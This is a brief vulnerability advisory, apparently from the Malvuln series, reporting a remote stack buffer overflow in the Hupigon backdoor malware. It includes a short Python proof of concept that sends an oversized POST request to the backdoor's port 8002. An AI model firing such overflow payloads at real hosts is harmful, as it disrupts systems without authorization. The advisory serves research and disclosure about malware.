Backdoor.Win32.Hupigon.adef Remote Stack Buffer Overflow

Backdoor.Win32.Hupigon.adef Remote Stack Buffer Overflow

Backdoor.Win32.Hupigon.adef malware suffers from a remote stack buffer overflow vulnerability.

Exploit/PoC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=8002

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PBARBAR="POST /"+"A"*4198+"HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+"A"*4198
    
    s.send(PBARBAR)
    s.close()
    
    print("Backdoor.Win32.Hupigon.adef / Remote Stack Buffer Overflow");
    print("MD5: c8f55ce7bbec784a97d7bfc6d7b1931f");
    print("By Malvuln");

if __name__=="__main__":
    doit()